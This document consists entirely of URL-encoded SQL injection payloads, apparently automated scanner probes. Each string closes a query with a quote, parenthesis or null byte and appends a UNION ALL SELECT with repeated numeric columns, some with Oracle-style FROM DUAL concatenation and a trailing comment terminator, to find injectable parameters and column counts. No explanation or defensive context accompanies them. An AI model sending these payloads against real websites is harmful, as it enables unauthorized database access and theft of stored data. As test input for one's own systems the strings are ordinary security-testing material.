-7867%00%27%20UNION%20ALL%20SELECT%206428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%2C6428%23 -9332%00%27%20UNION%20ALL%20SELECT%207077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%2C7077%23 -9309%00%27%20UNION%20ALL%20SELECT%206066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%2C6066%23 -3471%00%27%20UNION%20ALL%20SELECT%209183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%2C9183%23 -9503%00%27%20UNION%20ALL%20SELECT%203817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%2C3817%23 -1413%00%27%20UNION%20ALL%20SELECT%206063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%2C6063%23 -6530%00%27%20UNION%20ALL%20SELECT%205965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%2C5965%23 -3634%00%27%20UNION%20ALL%20SELECT%207882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%2C7882%23 -5703%00%27%20UNION%20ALL%20SELECT%201045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%23 -6039%27%29%20WHERE%207482%3D7482%20UNION%20ALL%20SELECT%207482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%2C7482%23 -2924%27%29%20WHERE%203082%3D3082%20UNION%20ALL%20SELECT%203082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%2C3082%23 -5494%27%29%20WHERE%209007%3D9007%20UNION%20ALL%20SELECT%209007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%2C9007%23 -8899%27%29%20WHERE%206999%3D6999%20UNION%20ALL%20SELECT%206999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%2C6999%23 -8688%27%29%20WHERE%209045%3D9045%20UNION%20ALL%20SELECT%209045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%2C9045%23 -4608%27%29%20WHERE%206617%3D6617%20UNION%20ALL%20SELECT%206617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%2C6617%23 -8770%27%29%20WHERE%206481%3D6481%20UNION%20ALL%20SELECT%206481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%23 -5671%27%29%20WHERE%205658%3D5658%20UNION%20ALL%20SELECT%205658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%2C5658%23 -9754%27%29%20WHERE%207202%3D7202%20UNION%20ALL%20SELECT%207202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%2C7202%23 -3491%27%29%20WHERE%201181%3D1181%20UNION%20ALL%20SELECT%201181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%2C1181%23 -2884%22%29%20WHERE%203992%3D3992%20UNION%20ALL%20SELECT%203992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%2C3992%23 -7253%22%29%20WHERE%209307%3D9307%20UNION%20ALL%20SELECT%209307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%2C9307%23 -1447%22%29%20WHERE%207935%3D7935%20UNION%20ALL%20SELECT%207935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%2C7935%23 -2202%22%29%20WHERE%202991%3D2991%20UNION%20ALL%20SELECT%202991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%2C2991%23 -1894%22%29%20WHERE%204668%3D4668%20UNION%20ALL%20SELECT%204668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%2C4668%23 -1572%22%29%20WHERE%206737%3D6737%20UNION%20ALL%20SELECT%206737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%2C6737%23 -8635%22%29%20WHERE%209998%3D9998%20UNION%20ALL%20SELECT%209998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%2C9998%23 -1639%22%29%20WHERE%204746%3D4746%20UNION%20ALL%20SELECT%204746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%2C4746%23 -1813%22%29%20WHERE%209602%3D9602%20UNION%20ALL%20SELECT%209602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%2C9602%23 -3530%22%29%20WHERE%206117%3D6117%20UNION%20ALL%20SELECT%206117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%2C6117%23 -3503%27%20WHERE%205333%3D5333%20UNION%20ALL%20SELECT%205333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%2C5333%23 -9007%27%20WHERE%207469%3D7469%20UNION%20ALL%20SELECT%207469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%2C7469%23 -4206%27%20WHERE%201433%3D1433%20UNION%20ALL%20SELECT%201433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%2C1433%23 -9920%27%20WHERE%209673%3D9673%20UNION%20ALL%20SELECT%209673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%2C9673%23 -1589%27%20WHERE%209690%3D9690%20UNION%20ALL%20SELECT%209690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%2C9690%23 -2547%27%20WHERE%205625%3D5625%20UNION%20ALL%20SELECT%205625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%2C5625%23 -4070%27%20WHERE%203970%3D3970%20UNION%20ALL%20SELECT%203970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%2C3970%23 -1318%27%20WHERE%209117%3D9117%20UNION%20ALL%20SELECT%209117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%2C9117%23 -4995%27%20WHERE%202746%3D2746%20UNION%20ALL%20SELECT%202746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%23 -2605%27%20WHERE%209577%3D9577%20UNION%20ALL%20SELECT%209577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%2C9577%23 -8688%22%20WHERE%204896%3D4896%20UNION%20ALL%20SELECT%204896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%2C4896%23 -7285%22%20WHERE%208844%3D8844%20UNION%20ALL%20SELECT%208844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%2C8844%23 -3351%22%20WHERE%203506%3D3506%20UNION%20ALL%20SELECT%203506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%2C3506%23 -6587%22%20WHERE%208689%3D8689%20UNION%20ALL%20SELECT%208689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%2C8689%23 -1575%22%20WHERE%204825%3D4825%20UNION%20ALL%20SELECT%204825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%2C4825%23 -2294%22%20WHERE%203625%3D3625%20UNION%20ALL%20SELECT%203625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%2C3625%23 -6337%22%20WHERE%206361%3D6361%20UNION%20ALL%20SELECT%206361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%2C6361%23 -2458%22%20WHERE%201493%3D1493%20UNION%20ALL%20SELECT%201493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%2C1493%23 -9786%22%20WHERE%204027%3D4027%20UNION%20ALL%20SELECT%204027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%2C4027%23 -6303%22%20WHERE%209218%3D9218%20UNION%20ALL%20SELECT%209218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%2C9218%23 -8765%27%7C%7C%28SELECT%20%27mrMN%27%20FROM%20DUAL%20WHERE%209036%3D9036%20UNION%20ALL%20SELECT%209036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%2C9036%23 -6205%27%7C%7C%28SELECT%20%27zzQt%27%20FROM%20DUAL%20WHERE%209331%3D9331%20UNION%20ALL%20SELECT%209331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%2C9331%23 -4562%27%7C%7C%28SELECT%20%27RoOX%27%20FROM%20DUAL%20WHERE%202959%3D2959%20UNION%20ALL%20SELECT%202959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%2C2959%23 -1163%27%7C%7C%28SELECT%20%27LImR%27%20FROM%20DUAL%20WHERE%208990%3D8990%20UNION%20ALL%20SELECT%208990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%2C8990%23 -1120%27%7C%7C%28SELECT%20%27uqFZ%27%20FROM%20DUAL%20WHERE%201617%3D1617%20UNION%20ALL%20SELECT%201617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%2C1617%23 -3929%27%7C%7C%28SELECT%20%27yGCk%27%20FROM%20DUAL%20WHERE%208830%3D8830%20UNION%20ALL%20SELECT%208830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%2C8830%23 -5945%27%7C%7C%28SELECT%20%27uRCB%27%20FROM%20DUAL%20WHERE%209800%3D9800%20UNION%20ALL%20SELECT%209800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%2C9800%23 -6541%27%7C%7C%28SELECT%20%27GwNC%27%20FROM%20DUAL%20WHERE%209540%3D9540%20UNION%20ALL%20SELECT%209540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%2C9540%23 -4164%27%7C%7C%28SELECT%20%27QGXE%27%20FROM%20DUAL%20WHERE%207671%3D7671%20UNION%20ALL%20SELECT%207671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%2C7671%23 -8262%27%7C%7C%28SELECT%20%27fJwu%27%20FROM%20DUAL%20WHERE%209562%3D9562%20UNION%20ALL%20SELECT%209562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%23 -3534%27%7C%7C%28SELECT%20%27jgtJ%27%20WHERE%209728%3D9728%20UNION%20ALL%20SELECT%209728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%2C9728%23 -8885%27%7C%7C%28SELECT%20%27pqTo%27%20WHERE%207548%3D7548%20UNION%20ALL%20SELECT%207548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%2C7548%23 -3833%27%7C%7C%28SELECT%20%27ALVO%27%20WHERE%201979%3D1979%20UNION%20ALL%20SELECT%201979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%23 -3456%27%7C%7C%28SELECT%20%27addy%27%20WHERE%202183%3D2183%20UNION%20ALL%20SELECT%202183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%2C2183%23 -1695%27%7C%7C%28SELECT%20%27eQVY%27%20WHERE%205407%3D5407%20UNION%20ALL%20SELECT%205407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%2C5407%23 -1964%27%7C%7C%28SELECT%20%27HrhS%27%20WHERE%202447%3D2447%20UNION%20ALL%20SELECT%202447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%2C2447%23 -7275%27%7C%7C%28SELECT%20%27tTFu%27%20WHERE%202812%3D2812%20UNION%20ALL%20SELECT%202812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%2C2812%23 -7833%27%7C%7C%28SELECT%20%27FIIP%27%20WHERE%201163%3D1163%20UNION%20ALL%20SELECT%201163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%2C1163%23 -8665%27%7C%7C%28SELECT%20%27YRsq%27%20WHERE%205061%3D5061%20UNION%20ALL%20SELECT%205061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%2C5061%23 